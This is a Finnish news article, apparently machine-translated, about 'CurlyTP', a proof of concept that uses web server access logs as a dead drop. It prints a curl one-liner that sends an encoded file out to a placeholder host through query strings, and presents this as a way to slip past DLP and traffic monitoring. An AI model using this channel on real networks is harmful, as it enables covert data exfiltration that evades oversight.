Wikipedian määritelmän mukaan kuollut pisara on salaliittoväline, jolla vaihdetaan tietoja tai joitain esineitä ihmisten välillä käyttämällä salaista sijaintia. Ajatuksena on, että ihmiset eivät koskaan tapaa – mutta silti he vaihtavat tietoja toimintaturvallisuuden ylläpitämiseksi.

Piilopaikka ei saa herättää huomiota. Siksi offline-maailmassa he käyttävät usein huomaamattomia asioita: irtonaista tiiltä seinässä, kirjaston kirjaa tai onteloa puussa.

Internetissä on monia salaus- ja anonymisointityökaluja, mutta näiden työkalujen käyttö herättää huomiota. Lisäksi ne voidaan estää yritys- tai hallintotasolla. Mitä tehdä?

Kehittäjä Ryan Flowers ehdotti mielenkiintoista vaihtoehtoa - käyttää mitä tahansa verkkopalvelinta piilopaikkana. Jos ajattelet sitä, mitä verkkopalvelin tekee? Vastaanottaa pyyntöjä, antaa tiedostoja ja kirjoittaa lokeja. Ja se kirjaa kaikki pyynnöt, jopa vääriä!

Osoittautuu, että minkä tahansa verkkopalvelimen avulla voit tallentaa melkein minkä tahansa viestin lokiin. Kukat ihmettelivät, miten tätä käytetään.

Hän tarjoaa tämän vaihtoehdon:

1. Ota tekstitiedosto (salainen viesti) ja laske hash (md5sum).
2. Me koodaamme sen (gzip+uuencode).
3. Kirjoitamme lokiin tarkoituksella väärällä pyynnöllä palvelimelle.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Tiedoston lukemiseksi sinun on suoritettava nämä toiminnot käänteisessä järjestyksessä: purkaa ja purkaa tiedosto, tarkista tiiviste (hash voidaan lähettää turvallisesti avoimia kanavia pitkin).

Välilyönnit korvataan =+=jotta osoitteessa ei ole välilyöntejä. Ohjelma, jota kirjoittaja kutsuu CurlyTP:ksi, käyttää base64-koodausta, kuten sähköpostin liitteitä. Pyyntö tehdään avainsanalla ?transfer?jotta vastaanottaja löytää sen helposti lokeista.

Mitä näemme lokeissa tässä tapauksessa?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Kuten jo mainittiin, saadaksesi salaisen viestin sinun on suoritettava toiminnot käänteisessä järjestyksessä:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Prosessi on helppo automatisoida. Md5sum täsmää, ja tiedoston sisältö vahvistaa, että kaikki on purettu oikein.

Menetelmä on hyvin yksinkertainen. "Tämän harjoituksen tarkoitus on vain todistaa, että tiedostoja voidaan siirtää viattomien pienten verkkopyyntöjen kautta, ja se toimii millä tahansa web-palvelimella, jossa on pelkkää tekstiä koskevat lokit. Pohjimmiltaan jokainen verkkopalvelin on piilopaikka!" kirjoittaa Flowers.

Tietenkin menetelmä toimii vain, jos vastaanottajalla on pääsy palvelimen lokeihin. Mutta tällaisen pääsyn tarjoavat esimerkiksi monet isännöitsijät.

Kuinka käyttää sitä?

Ryan Flowers sanoo, ettei hän ole tietoturva-asiantuntija eikä aio laatia luetteloa CurlyTP:n mahdollisista käyttötavoista. Hänelle se on vain todiste konseptista, että tuttuja työkaluja, joita näemme päivittäin, voidaan käyttää epätavallisella tavalla.

Itse asiassa tällä menetelmällä on useita etuja verrattuna muihin palvelimen "piiloihin", kuten Digital Dead Drop tai piratebox: se ei vaadi erityisiä konfigurointia palvelinpuolella tai erityisiä protokollia - eikä herätä epäilyksiä liikennettä valvovien keskuudessa. On epätodennäköistä, että SORM- tai DLP-järjestelmä skannaa URL-osoitteista pakattuja tekstitiedostoja.

Tämä on yksi tavoista lähettää viestejä palvelutiedostojen kautta. Voit muistaa, kuinka jotkut edistyneet yritykset sijoittivat Kehittäjätyöt HTTP-otsikoissa tai HTML-sivujen koodissa.

Ajatuksena oli, että vain web-kehittäjät näkisivät tämän pääsiäismuna, koska normaali ihminen ei katsoisi otsikoita tai HTML-koodia.

Lähde: will.com